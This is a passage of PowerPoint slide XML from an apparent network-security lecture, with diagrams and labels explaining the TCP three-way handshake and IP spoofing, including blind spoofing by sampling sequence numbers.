          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44038" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2014538" y="4438650"/>
            <a:ext cx="1084262" cy="847725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44039" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5859463" y="4438650"/>
            <a:ext cx="1085850" cy="847725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44040" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="3857625"/>
            <a:ext cx="6096000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44041" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4029075" y="2438400"/>
            <a:ext cx="1085850" cy="847725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44042" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3776663" y="5318125"/>
            <a:ext cx="1433512" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:srgbClr val="60C900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trusted host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44043" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1781175" y="4441825"/>
            <a:ext cx="420688" cy="487363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44044" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6842125" y="4441825"/>
            <a:ext cx="420688" cy="487363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44045" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3957638" y="1906588"/>
            <a:ext cx="1455737" cy="487362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FC0128"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Intruder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44046" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3101975" y="5322888"/>
            <a:ext cx="2830513" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="lg"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44047" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6243638" y="1423988"/>
            <a:ext cx="2238375" cy="344487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Three-way handshake</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44048" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6807200" y="1781175"/>
            <a:ext cx="912813" cy="344488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SYN(A)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44049" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6334125" y="2084388"/>
            <a:ext cx="1974850" cy="344487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ACK(A+1) SYN(B)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44050" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6734175" y="2424113"/>
            <a:ext cx="1182688" cy="344487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="87094" tIns="43547" rIns="87094" bIns="43547">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="865188"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ACK(B+1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44051" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6403975" y="2036763"/>
            <a:ext cx="1741488" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44052" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6423025" y="2679700"/>
            <a:ext cx="1741488" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44053" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6403975" y="2374900"/>
            <a:ext cx="1741488" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="stealth" w="med" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Spoofing Attacks:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>2. Blind spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> This attack may take place from outside where sequence and acknowledgement numbers are unreachable. Attackers usually send several packets to the target machine in order to sample sequence numbers, which is doable in older days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loud"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="1295400"/>
            <a:ext cx="3352800" cy="2257425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Spoofing Attacks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b="1" smtClean="0">
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46084" name="Picture 4" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="5029200"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46085" name="Oval 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="2133600"/>
            <a:ext cx="1066800" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>sender</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46086" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="5638800"/>
            <a:ext cx="768350" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46087" name="Picture 7" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6594475" y="1828800"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46088" name="Picture 8" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="1622425"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46089" name="Picture 9" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5519738" y="2316163"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46090" name="Picture 10" descr="pc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6324600" y="2514600"/>
            <a:ext cx="796925" cy="663575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46091" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="2895600"/>
            <a:ext cx="1874838" cy="1968500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1181"/>
              <a:gd name="T1" fmla="*/ 0 h 1240"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1181"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 1240"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1181"/>
              <a:gd name="T10" fmla="*/ 0 h 1240"/>
              <a:gd name="T11" fmla="*/ 1181 w 1181"/>
              <a:gd name="T12" fmla="*/ 1240 h 1240"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="1181" h="1240">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="172" y="123"/>
                  <a:pt x="883" y="528"/>
                  <a:pt x="1032" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1181" y="942"/>
                  <a:pt x="924" y="1135"/>
                  <a:pt x="895" y="1240"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46092" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1993409">
            <a:off x="3276600" y="3048000"/>
            <a:ext cx="1974850" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP">
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>ip spoofed packet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="1979872">
